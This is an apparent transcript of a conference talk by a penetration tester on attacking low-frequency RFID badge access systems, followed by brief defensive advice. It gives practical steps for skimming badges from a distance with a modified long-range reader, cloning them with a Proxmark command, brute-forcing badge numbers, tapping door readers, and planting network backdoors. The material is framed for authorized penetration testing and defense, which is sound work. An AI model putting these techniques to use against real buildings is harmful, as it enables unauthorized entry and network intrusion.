 Welcome, everybody, to RFID hacking. Live free or RFID hard. My name is Fran Brown. I'm a managing partner at Bishop Fox. We just rebranded it and got some exciting stuff to show you guys here today. I'm just going to get right into it. Basically what I want to go over today is to cover practical advice on successfully performing a penetration test of an RFID physical security system. A little bit of background behind this. About a year ago I was doing an assessment of electric utility and I needed to get to their SCADA network which was only accessible from two buildings. So I needed to break into a building. That was my goal. So I started looking into, you know, different RFID presentations that have been in the past. Unfortunately there was no hacking exposed RFID that just let me know what I would need to know to be able to break into a building. So I watched all the past presentations I could find, anything I could find. And after a couple days I realized I was no closer to achieving my objective than I was when I started. Most of the presentations in the past discussed tools that weren't released or were more theoretical. They didn't give me exactly what I needed to know to be able to break into a building. So that's what I hope to cover here today. And I'm going to finish up with practical defenses as well so you know how to protect yourself. So breaking it down, it's a pretty simple methodology. When I want to do an RFID penetration test, it just boils down into three simple steps. First, steal somebody's badge information without them realizing it while walking by them. Two, taking that information and making a clone of their card. And then three, going into the building that I want to break into and possibly planning a back door so I don't have to stay there very long. Seems pretty simple. But the thing that I soon realized that step one was a little bit difficult because most of the tools out there required you to get within a couple centimeters to be able to successfully steal someone's badge information out of their pocket or purse or what have you. So that kind of led to what I like to call the ass grabbing method of RFID hacking. I watch these are all from different presentations, YouTube videos, things I've seen in the past where the people go on and on about how insecure it is and how easy it is to steal somebody's badge information and then they have things like this where they're walking up and grabbing people's asses with a Proxmark run down their sleeve with a big CD sized antenna and you know, walking around ass grabbing. I don't know how many, you see Jonathan West who's up there. I don't know how many times you could potentially do that, walk around and you know, I target facility and start grab assing before you actually get caught. I imagine maybe once or twice. So this wasn't a realistic thing for me. This isn't going to work. I'm not sure what I could do at this point. But there's not really any tools that are out there that would allow me to realistically be able to pull this type of attack off. So I started looking into my own custom solutions and with that I'm going to do a couple of quick videos that I think demonstrate the limitations as well as our tools for stealing for step one there and making a clone of a card just to show how easy it is now to be able to pull this off and steal someone's badge number and then break into a building. So can you guys see that okay? So in this first one, this is kind of demonstrating how many of you are familiar with the Proxmark 3. It's probably number one tool you could buy. It's actually really great for a lot of purposes. Sorry about that. It's too much for the microphone. But as you'll see here, it also has the problem of distance. This is the Proxmark. This is a RFID hacking tool you could buy by far the most popular. We have it's plugged into my laptop here via USB and then via another cable there's the antenna. And we see that right now we are running the Proxmark and we have it in listening mode. It's trying to read right now. So as we can see, it still does not see the card even at this range. So I'll keep going down, keep going down, getting closer to the antenna. Closer still until there we go. 6339. We had to be within privately about an inch right here before it actually starts picking up the badge information. 6339. So this is about how close you have to get to somebody on their person to be able to effectively use this tool to steal their information. Which is a little too close for comfort if you ask me. So I mean, how many people here have pulled off successful penetration tests with the Proxmark or whatever existing tools that are out there? Handful of people? I guess you could but you saw the antenna and it's about the size of a CD and typically people would run it down their sleeve and have the CD and try to go up and guess where the person has their badge on them to begin with if you don't know which pocket it is and start feeling around. So I saw a few things where people posted custom solutions that they had done. They didn't really release code or practical advice on how to put it together. So I kind of had to do my own thing. It will be up on the website tomorrow but my goal here was to make it so that I can create a tool that security professionals who don't know a lot about RFID or have an electrical engineering background or are going to build their own custom antennas, your average security professional who wants to be able to perform this kind of pen test so they can get up and running realistically quickly. So wanting to be great if there was a tool that took that step one that allowed us to secretly steal this information without having to go up and grab somebody's butt. So as a crazy random happenstance, we do have such a tool. 6339 again. We look to my left here. This is where I'm calling the Tastic Long Range RFID Steeler from my company Bishop Fox and we see there's just a weaponized commercial reader. So we'll go ahead and throw that up there and you can see it's a 26-bit card. And again, Pasodica 113 and card number 6339. So it outputs it to the screen nice as well. I'm clearly a few feet away right now. And with this, I can steal the information without having to go up and grab somebody's butt. So taking a little quicker look at what this tool is actually doing and how the circuit board comes into play. I'm going to turn this off and we can see that it is about a foot by foot and only an inch deep. Extremely light, portable. Have a missile switch on the back here which I was using to not accidentally turn it on, things like that. It's completely self-powered and portable. So what you would do is take this, put it in your messenger bag or backpack or briefcase, walk around with it, walk by somebody from up to three feet away and pick up their badge information which is much better than grabbing butts up here. Now it is a right to the screen but we actually see it's easy to take apart here. Just a single screw in the front, thumb screw that I could just twist out and take the lid off. And what we have here is this is a long-distance commercial badge reader. The kind you would find in parking lots so that you don't have to get out of your car. You can just roll it on your window and reach your arm out of the car window and hold your badge out and get it picked up. So it's meant to be picked up from several feet away. All of this was in here to begin with. All I did was add the LCD screen, the batteries, to self-power it and you will recognize this circuit board here which you have without all of the things I already installed. But it has all the logic, the code behind it will be on our website for you to download as well and this is just an Arduino controller that you can buy online on Amazon, Radio Shack, as well as just some resistors and a few things there you can pick up anywhere. We have detailed instructions on the website on how to recreate this which is our main goal here. And finally we see we have a micro SD card which not only was a writing it but it was actually writing it to the SD card in cards.txt, file. So pretty cool. Basically, thank you so, for those who are really attached to it, the ASGrabbing methodology is still your disposal if that's what you want to do. But this I think is a much better solution. And as you can see it's super light, got just self-powered, completely portable. Picks it up from a couple feet away as opposed to a centimeter or two. And yes, so effectively this was my attempt at solving that step one of those three steps. And then I just have one more video which shows you step two which I mentioned, I like the Proxmark for a lot of things but this is your micro SD card, the output of it. Just going to pop it into my laptop, should come up over here. So we should see the SD card came up that I pulled from our long range RFID Stealer. Check that out and we see that there's a single file, cards.txt, just a simple text file. Click on that. And we see here we scanned it a few times, it's a 26 big card. Here is the hexadecimal notation for that badge information. We actually decoded for you, it's facility code 113 and badge number 6339 as we saw printed on the card. And we actually have the binary as well. So now we've successfully completed step one. We've taken this silently stealing badge information and made it a realistic possibility where we can from three feet away casually walk by you and steal the information. Now that we have that we can use tools like the Proxmark to quickly create a clone fake version of your badge so that we can go use it. And that is extremely easy, it's a single command. We already have the Proxmark set up here. So what we're going to do is I'm going to go ahead and copy the hexadecimal version of this badge, 6339. Click copy. And we're going to come back to our Proxmark here. Now the Proxmark is in read mode right now, so by hitting this button I'll stop that. So now we have the badge information from our tool, just this hexadecimal value. And what we're going to do is take this programmable T557 card, which is a programmable card that doesn't read anything right now. And we can turn this, this is just a sticky note. It's clearly not the 6339 badge. Let's put a post it on there. It's programmable. So I just lay that on top of the antenna here. And if we look right here all I'm going to do is type in LF for low frequency. Hit, hit card, clone, space. And then I'm just going to paste in that value we took from our cards.txt file. And click there. And we see cloning tagged with that value that we stole, done. So right now this card is functionally an exact duplicate of the card that we stole. 6339. So let's test it out. So we have our original again, badge number 6339. They have our original card 6339. And it's a Proxcard to you. Go over here. 6339 still. Now we take our clone card, this card which is clearly not that same card. It says my 3rd Korean writing on there. And we go up to it. Badge 6339. Facility code 113, 26-bit card. So now we've successfully stolen and now made a fake copy of this person's badge. Cool. So pretty easy now, right? Hopefully you guys can get up and run them with this kind of tool. And at this point I've been able to train some of our consultants to do it now in about 10 minutes. Here's the on switch which is also the off switch. On the back, you know, go forth and prosper. So with that, what we're talking about here is low frequency. I saw with some of the articles that came out, people were posting links to high frequency, long range antennas and things like that. But we're talking the 125 kilohertz low frequency technology for physical security systems. And looking at that, people have known about these issues for quite some time. But the interesting thing to me was that no one's really done anything about it yet. This came from HIT Global directly from a post they had recently saying that 70 to 80 percent of physical security systems out there still use this legacy low frequency technology that we're exploiting here. Despite us having known for quite some time and they admit that, you know, there's no security. They've been hacked. We know this. They're not resistance to any of these kind of common attacks yet they still persist. And just looking at that, one of the motivations behind doing this talk actually after creating the tools was I noticed that, you know, we see in Chris Pagin's talk from 2007, you know, it couldn't be any simpler. If you're using this technology for your doors, you're highly insecure. I mean, it's a big bullet. That's it. That's 2007. And those quotes came from this blog post in June of 2013. So from 2007 to 2013, we've made about zero progress in terms of upgrading these physical security systems. And that blog post is actually pretty interesting and goes on to talk about some other reasons why. The physical security product life cycle is about 20 years they estimate. So most of the things out there were bought in the early 90s. HIT offers more secure solutions but people, you know, bought and installed products from 20 years ago and are just more than happy with it. So for some extent, it's ignorance on the part of the people making the purchase decisions. They just don't realize that these things are this insecure as well as there's budget issues. So what we're looking at here is a basic breakdown of what's happening for a badging system for a door. There's four main components. And coincidentally, if we're thinking about doing a pen test, those are the four areas that we'll want to target. So with this attack, we're targeting the card directly. We're going to the local Starbucks in your building. We want to break into or hang out in the smoke area or something like that and targeting the cards that are on somebody's person. These cards, basically, when they come within near distance of a reader like this, the reader powers it and it just starts singing out 26 to 37 ones and zeros. That's it. As soon as it gets powered, it just starts singing this out depending on what they have. And then the reader just reads these off the air and then encodes them in a weekend protocol, which I'll talk about a little bit, and just forwards them on to the controller to make the decision about whether to open the door or not. And then you have the host PC where a physical security guard will be sitting at to add new users and monitor cameras and things like that. So in breaking this down and doing this initial research, it was like pulling teeth. I mean, just trying to understand what was going on with these things. What's written on the card? How far away can I be? Every question that would jump to your mind, if you didn't know anything about RFID hacking, it would be like the 130th Google hit or some random product manual that I found the answer in. So I tried to compile as much as I could here to make it easy. But one of the questions that come up is if I saw somebody's badge, if I looked at the number on the back, is that enough information for me to make a fake copy of it? You know, if you went on Google images and somebody took a picture and you saw their badge number, you know, could you make a copy of that? Well, the short answer is maybe if they're... So basically those 26 to 37 ones and zeros that it sings out the card when it comes to your reader, those eventually get interpreted by a controller. And the way they get interpreted is basically what they call the card format, which typically breaks down into your card ID and a facility code. What's written on the card is the card ID, which is part of what you need. If they're using a standard 26-bit card, then there's only 255 possible facility codes. So technically with that, I could just try that card number and facility code one, facility code two, facility code three, and pretty quickly be able to prove force based on what you visually see on the card. If they implement it like a 35-bit card or something, then it wouldn't be as easy to do. There's also... You'll typically see on these cards one number and then a space and then a longer number. That longer number is just a sales order number. I found it in a product manual. It's... If you want to buy more cards when you call the sales guy, you read them that number. It has nothing to do with authentication or getting you in the door or anything like that. So good to know. And this is what I'm talking about with the... So in reading this as well, I saw things from your standard 26-bit card or your corporate 35-bit card. And then you hear that they're 44-bit cards. And then in the prox marks, you see typically when tools that are accessed in them are 10 hexadecimal digits, which is only 40 bits. So what exactly is going on with the card was a little confusing to me because people didn't really make it clear. So just to make it clear what's actually going on, it sings out 26 to 37 bits in the air. It's always 44 bits on the card. And when we see here... I just gained this in from a product manual and put the notation there myself. Typically the... Always the first hexadecimal will be a zero, which usually gets dropped, which is why you see it as 10. You see the full version there of 11 hexadecimal digits starting with a zero. So what happens is there's always 44 bits in the card, which you see up there. The standard 26-bit is what you see on the right. And then there... It starts... Everyone look at that guy with the stare. So it's always... Every single card, it starts with six zeros and a one. Every single card. Six zeros and a one. And then there's a buffer of 10 zeros and then a parity or sentinel bit and then your 26 bits. So if you have a 35-bit card or anything up to 37, all it does is extend to the left there using that buffer of those 10 zeros. And that's the full 44 bits that are on the card. So mystery solved. This is on low frequency stuff and mainly for breaking into buildings. But this type of attacks and the techniques that we're going for here are going to be only become more applicable as we go on. We're starting to see them in credit cards in the U.S. now, passports in my favor. Who here is a Disney fan? Anybody of Disneyland, Disney World? Yeah, so Disney is going over to RFID for everything. So it's going to be fun experiments, some field research, get some fast passes to get to the front of the lines and things like that. See the band there on somebody's wrist. Everything from getting in the front door of Disney World to getting your fast passes for the rides, to paying for things, to your hotel room are all going to be, it's all RFID based. They're rolling it out right now. So these things are just, you know, people are finding more and more uses for RFID technology that are going to be fun to do pentas for. A couple of the tools that you want to have in your arsenal besides our tool here, I would definitely recommend the Proxmark. You can get cheaper versions, but the nice Palace version is $3.99. You can use it as we saw in the one video for making clone cards. It has all kinds of purposes that are great for doing RFID hacking. It does have a single button on it. See that workflow there? One crazy workflow for the single button on top of the Proxmark, which is a little fun. It's like staying on one foot and hold the button for four and a half seconds until it blinks red and orange and then hold it longer. That's literally the one button's workflow, which is pretty cool. Another cool thing with the Proxmark is there's a tool called the Prox Brute. Have any of you guys heard of the Prox Brute before? So the Prox Brute is just custom firmware that someone from McAfee got in Brad released that you can load onto the Proxmark and use it to do brute forcing. Each of these badges, we saw the card number and facility code. Once you have like a valid badge, if you stole maybe just a normal worker's badge information to get in the front door, but you want to get in the data center and that person didn't have access. Well, the card numbers themselves are sequential. So you could use this tool and the Proxmark will simulate being a badge and it will try that number, the next badge number, the next badge number. So it will allow you to brute force a different badge number to get into a data center or more secure area than the actual badge that you stole, which is great. And it has a similar crazy workflow for that one button, which is altered there. Just see. Also, there's Adam Laurie's stuff, the RFID scripts. So Adam Laurie's done a bunch of talks. Over time has compiled a bunch of different Python scripts for doing RFID hacking. And he just keeps adding to them. So for all sorts of different purposes. So I definitely recommend checking that out. As well as one convenience is that the software, it all comes loaded on backtrack. So all you need to do is get the equipment, plug the USB in and fire up backtrack and you could be up and running and doing some stuff pretty quickly. These are extremely cool. Has anyone seen these tools before from RFIDs? I don't typically, I don't think I've ever seen this in a security presentation on RFID. I happened to stumble across it. And basically it's just too little USB sticks about that size. It requires no software. It's for field testing, for people that install this type of equipment. And basically, one of the questions that I had, that I want to answer was, what if I don't know what kind of card this is? What if I don't know what technology it's using? Take the Disney example. The Disney stuff doesn't have identifying, it has all Walt Disney stuff on their cards. It doesn't have what kind of card it actually is. So if I wanted to figure out what technology it was, I would use these things. This is to have a high frequency and a low frequency little USB stick. You plug it in, you open up notepad, you lay a card on top of it and click print screen. And in notepad it will tell you not only what the badge information is, but exactly what technology it is. Which matters for being able to understand what kind of tools you're going to need to break into it. So pretty cool. And then again, this is our tool again, we just saw the demonstration of already. I programmed in there, you see a 35-bit card. Basically you'll be able to get one of those circuit boards I'm about to give out or go to our website, I should be able to tomorrow, download the code that you could send away to anyone that makes circuit boards and for about 30 bucks they'll send you a copy. Then you buy the parts that you need, load the code that we have, it will be on our website and be up and running. You essentially plug this into any RFID reader that there is for any of the technologies. So as we'll see, a simple missile switch in the back, easily from three feet away. I designed it, what I'll be releasing, I designed it in fritzing. How many of you guys are familiar with fritzing? Anybody play around with it? Which allows us, I'll be releasing that and you can actually export it to extended grabber to send away to actually get the board. That's a picture of the board that I'll be giving away, I'll answer the talk. And essentially you could take, you could take this board and it just basically has two inputs and two outputs. It's taking in the output of a reader, like this one here, it's taking in the batteries and it's outputting the badge number to a screen and to a text file on the card. That's as simple as you could think of how the board is working. And it's tapping that output of the reader, is this Wegan output that I mentioned earlier, which every single badge reader has this output and they typically use. So those 26 to 37 ones and zeros, basically there's data one and data zero. For each one it sends a pulse on data one, for each zero it sends a pulse on data zero. And we're just tapping into that. So essentially you could use this for any type of badge system. So the two main ones for physical security are HID procs and indola procs for the low frequency, which technically are both owned by the company HID at this point. But if I held a HID badge up to an indola reader it wouldn't do anything. Or if I held an indola card up to a HID reader it wouldn't do anything. So between these two long distance readers, one of what you see here, you're pretty much covered with 99% of the badges that people would have out there. So you could take my board, plug it into the HID reader, which we have here, and if you notice it's not working you could plug it into the long distance indola reader and just walk around and grab people's indola cards as well. You see the proof and secure lies written there for indola. Indola claims to be more secure and they have a lot of people convinced that it is. Instead of just singing out the ones and zeros it does a little bit of obfuscation, which doesn't even matter because if we're using an actual indola reader like we are, it does all the decoding for you. So it's very easy to do and we've made fake versions and so both of these are just susceptible. And finally I just plugged in with Arduino an SD card and writing it to a text file for ease but there are plenty of Arduino add-ons that you can imagine when we play around with an ad next from adding Bluetooth capabilities so I could see the badges on my phone as they're being read or even cell phone capability to have a text message mean every badge that it sees if I leave it somewhere else. These things would be relatively easy to add on to this type of technology. Drop of no eaves, Mr. Gandalf. Basically if you guys are aware of any tools that do this attack you can let me know. I've heard people talk about it in theory and some PhD papers but the distance limitation that we're now getting with three feet and what centimeters before is due to powering the card not actually reading the ones and zeros that it's singing out so people have talked about if you leave something near the front door of an actual building and you let the real reader of that door power their card you can listen for those ones and zeros from further away. And I know that Chris Pageant's talk he had mentioned being able to get up to ten feet with this in this passive mode letting someone else power it. This tool obviously never was released due to legal reasons I believe and I haven't seen any of the tools that actually successfully do it but it is something to be aware of in terms of getting further distance still. You can copy of the card I mentioned this in the video the which you would want to get are these T55X7 cards as all kind of like a dollar you could buy them online. Oh just a note all these slides my note sections are like white papers links to everything you would want for each topic are in there and I'll have links to where you buy these but these things are not blank cards they're programmable cards so they'll simulate the data and behavior of any type of card and what I meant by when I mentioned a hid card wouldn't work with indola and indola card wouldn't work with hid these cards can behave like an indola card or they can behave like a hid card so they could simulate any type of card and the data on them so I mean they're definitely something you want to have in your your arsenal to you can reprogram as much as you want to be your your fake versions of cards finally if people start you know using RFID blocking wallets and stuff like that we got to move down the line of what we're attacking there are things out there where you can you know pop open the lid of the reader and start dumping things off the readers and attack them directly there's a man in the middle tool called gecko where you plug it in the reader and as people badge in it's writing them all to something as well and I didn't really design my circuit board to be used in that way but I realized afterwards with a little minor alterations you could use that circuit board all I'm doing is tapping into the output of a real reader you could take that circuit board go to the front of a building that you're trying to break into pop the lid off insert it and have it sit there you know and record all the other real badges that are coming through that reader so you could use it in this way as well and this bread butcher's last name in in tonowitch from the from McAfee the guy that actually made that prox brute software I'm talking about he has a project here that you can see where he's come up with tons of scripts and things to attack the readers and attack the controllers directly which are pretty cool I would recommend checking out lastly once you get in you want to not be in the building any longer than you have to be so I recommend when you're familiar with that poem plug I cool so it's just going to be your little personal VPN your back door into their network it's a thousand dollars for the regular phone plug in fifteen hundred for the power phone it's pretty cool looking it's a little hefty I would recommend a lot of people are coming out with images for the raspberry pie that allow them to effectively do the same exact thing from even from pony express people to make the phone plug at the raspberry phone the rogue pie the phone pie so for thirty five dollars instead of fifteen hundred dollars you can create your own a little back door to be on the network and you see there people use you know hollowed out old laptop chargers things like that with a raspberry pie in it to be there a little back door which is pretty cool think we're just about out of time so I'm going to skip the defenses avoid being probes I don't know if this will help you out or not but it's very fashionable so I would recommend upgrading your systems if possible to the contact with smart cards the high frequency stuff these things could do challenge response authentication and encryption there's more secure products out there if you're a company that has a hundred thousand employees placing everybody's badges and you know every single door out there might be not that realistic at least in any kind of good time frame so in order to get around that what I would recommend is you know changing using things like anomaly detection software so that if I badge in at eight in the morning every morning but all of a sudden I'm badging it a four in the morning in a building I never go to you can have it you know generate an alert and fly you also you have the protective sleeves that I'll talk about more in a second but you want to not wear badge and prominent view so I can't make a realistic looking picture of it security screws that prevent people from easily popping the lid off your reader on your door instead of just normal screws and there's also one's somebody readers at the check with tamper detect mechanisms that I'll send an alert of someone's messing with the reader and then finally the last slide is that those protective sleeves that you would get some of them work and some of them don't so before you buy a hundred thousand of them for your employees make sure that it works this is a green card protective sleeve which one of our employees is from Scotland very charming fellow and he has this green card which has RFID in it and has this sleeve that you should keep it at all times to prevent communication with your with your card it doesn't work at all it might as probably just a piece of paper so I don't know how they got over selling that to the federal government for every single green card but it doesn't work at all so and in my experience there's no rhyme or reason it's about half of them work half of them don't so get a sample tested out before you buy them in bulk for your company and that's it